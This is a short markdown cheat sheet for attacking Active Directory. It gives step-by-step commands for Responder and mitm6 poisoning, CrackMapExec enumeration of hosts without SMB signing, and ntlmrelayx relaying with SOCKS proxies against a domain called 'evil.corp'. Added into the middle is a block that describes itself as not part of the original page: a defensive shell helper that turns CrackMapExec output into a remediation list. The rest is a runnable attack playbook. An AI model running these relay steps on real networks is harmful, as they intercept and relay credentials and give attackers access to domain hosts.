# AD Attacks

## 1 - Running Responder

```
./Responder.py -I eth0
```

## 2 - Mitm6 (run simultaneously with Responder)

```
mitm6 -i eth0
```

## 3 - CrackMapExec

#### Install first

```
sudo add-apt-repository ppa:deadsnakes/ppa
sudo apt update
sudo apt install python3.8 python3.8-dev python3.8-venv
python3.8 -m venv python3.8-venv
source python3.8-venv/bin/activate
pip install --upgrade pip
pip3 install crackmapexec
```

#### Run alongside steps 1 and 2 to list hosts with SMB signing set to False:

```
# Match the signing field itself; a bare "False" also matches (SMBv1:False)
crackmapexec smb 10.2.55.0/20 --gen-relay-list relay-hosts.txt | grep "signing:False"
```
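For a signing audit, the banner fields can be parsed instead of grepped, so that only hosts with `signing:False` end up on the remediation list. This is an added example, not part of the original page or of CrackMapExec; the sample lines are constructed and `sample_cme_output` / `signing_not_required` are hypothetical helper names.

```shell
#!/bin/sh
# Constructed sample of `crackmapexec smb <range>` output; hosts and names are
# made up. The second line carries ANSI colour codes, which can end up in
# captured terminal output.
sample_cme_output() {
    printf '%s\n' 'SMB         10.2.55.10      445    DC01             [*] Windows Server 2019 Standard 17763 x64 (name:DC01) (domain:evil.corp) (signing:True) (SMBv1:False)'
    printf '\033[1m\033[34mSMB\033[0m%s\n' '         10.2.55.21      445    FS01             [*] Windows Server 2016 Standard 14393 x64 (name:FS01) (domain:evil.corp) (signing:False) (SMBv1:True)'
    printf '%s\n' 'SMB         10.2.55.34      445    WS-034           [*] Windows 10.0 Build 19041 x64 (name:WS-034) (domain:evil.corp) (signing:False) (SMBv1:False)'
}

# Hypothetical helper: read CME smb output on stdin and print
# "ip,name,domain,smbv1" for every host whose banner says signing:False.
signing_not_required() {
    esc=$(printf '\033')
    # 1) strip colour escapes, 2) keep only lines whose signing field is False
    sed -E "s/${esc}\[[0-9;]*m//g" |
    sed -n -E 's/^SMB[[:space:]]+([0-9.]+)[[:space:]]+[0-9]+[[:space:]].*\(name:([^)]*)\) \(domain:([^)]*)\) \(signing:False\) \(SMBv1:(True|False)\).*$/\1,\2,\3,\4/p'
}

# DC01 enforces signing and must not be listed, although its line contains
# "False" (SMBv1:False) and would pass a bare `grep "False"`.
sample_cme_output | signing_not_required
```

The fourth column also flags hosts that still have SMBv1 enabled, so the same list can drive both hardening items.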

## 4 - Run Mitm6

```
mitm6 -d evil.corp
```

## 5 - Run Ntlmrelayx with Mitm6

#### Run together with step 4 (mitm6) for relays:

```
ntlmrelayx.py -6 -socks -smb2support -tf relay-hosts.txt
```

